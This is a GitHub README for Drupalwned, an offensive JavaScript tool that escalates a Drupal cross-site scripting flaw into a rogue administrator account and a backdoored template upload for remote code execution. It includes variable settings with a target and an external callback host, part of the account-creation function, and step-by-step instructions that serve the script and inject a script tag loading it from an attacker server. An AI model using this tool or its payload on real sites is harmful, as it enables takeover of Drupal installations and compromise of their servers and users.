/Drupalwned

Drupalwned is a script designed to escalate a Cross-Site Scripting (XSS) vulnerability to Remote Code Execution (RCE) or other's criticals vulnerabilities in Drupal CMS.

Primary LanguageJavaScript


Drupalwned

Drupal Exploitation Script that elevate XSS to RCE or Others Critical Vulnerabilities.

About - Key Features - How To Use - Examples - Contributing

drupalwned

About

Drupalwned is a script designed to escalate a Cross-Site Scripting (XSS) vulnerability to Remote Code Execution (RCE) or other's criticals vulnerabilities in Drupal CMS.

💧 This script provides support for Drupal Versions 7.X.X, 8.X.X, 9.X.X and 10.X.X. 💧

Key Features

  • Privilege Escalation
    • Creates an administrative user in Drupal.
  • (RCE) Upload Template
    • Upload custom templates backdoored to Drupal.
  • // Pending
    • more ways to get RCE

How To Use

Example.mp4

1) Clone the Repository

git clone https://github.com/nowak0x01/Drupalwned

2) Edit the script by selecting the desired function and modifying its variable values. (Example: DPCreateAccount)

// ************************************ ~% Variables %~ ************************************ //

var Target = "https://172.17.0.1:8000/"; // Ex: https://192.168.84.212:8000/drupal/
var Callback = "http://zfi0g0xtiqb6qjh564xr92xnxe35rvfk.oastify.com/"; // Ex: https://collaborator.oastify.com/ (optional) (only if you want to receive feedback at each stage).

// ************************************ ~% Functions %~ ************************************ //

// DPCreateAccount(); // (Privilege Escalation) - Creates an Administrative user in Drupal.
// DPUploadTemplate(); // (RCE) - Upload a Template module (backdoor) to Drupal.

function DPCreateAccount() {

    /* ************************************************************************************************************************************************ */
    var Email = "nowak@example.com";  // Ex: user@company.net (It is recommended to use a business email from the target company) (No email will be sent to the email address entered). - <Mandatory>
    var Username = "nowak";         // (It is recommended to use a valid employee name from the target company). - <Mandatory>
    var Password = `j^QEkyvd7*g3`;  /* - <Mandatory> 
                            Make it at least 12 characters
                            Add lowercase letters
                            Add uppercase letters
                            Add numbers
                            Add punctuation
                                    */
    /* ************************************************************************************************************************************************ */

3) Start a web server

python3 -m http.server 80

4) Go to the Drupal XSS vector and include drupalwned.js

https://drupal.example.com/plugin.php?s=<script%20src="//VPS/drupalwned.js"></script>

Examples

🌧️ DPCreateAccount() - Creates an user in Drupal.

CreateAccount.mp4

DPUploadTemplate() - Upload a custom template backdoored to Drupal.

UploadTemplate.mp4

Contributing

If you're interested in contributing, enhancing the existing code, your efforts would be immensely appreciated. Your contributions will play a key role in making this project even better.

               r
               ain
               rai
              nrain
             rainrai
            nrainrain
           ainrainrain
          rainrainrainr
         ainrainrainrain
        rainrainrainrainr
      ainrainrainrainrainra         Drupalwned (https://github.com/nowak0x01/Drupalwned)
    inra nrainrainrainrainrai                      @Author: Hudson Nowak
  nrain  inrainrainrainrainrain
 rain   nrainrainrainrainrainrai
nrai   inrainrainrainrainrainrain
rai   inrainrainrainrainrainrainr
rain   nrainrainrainrainrainrainr
 rainr  nrainrainrainrainrainrai
  nrain ainrainrainrainrainrain
    rainrainrainrainrainrainr
      rainranirainrainrainr
           ainrainrain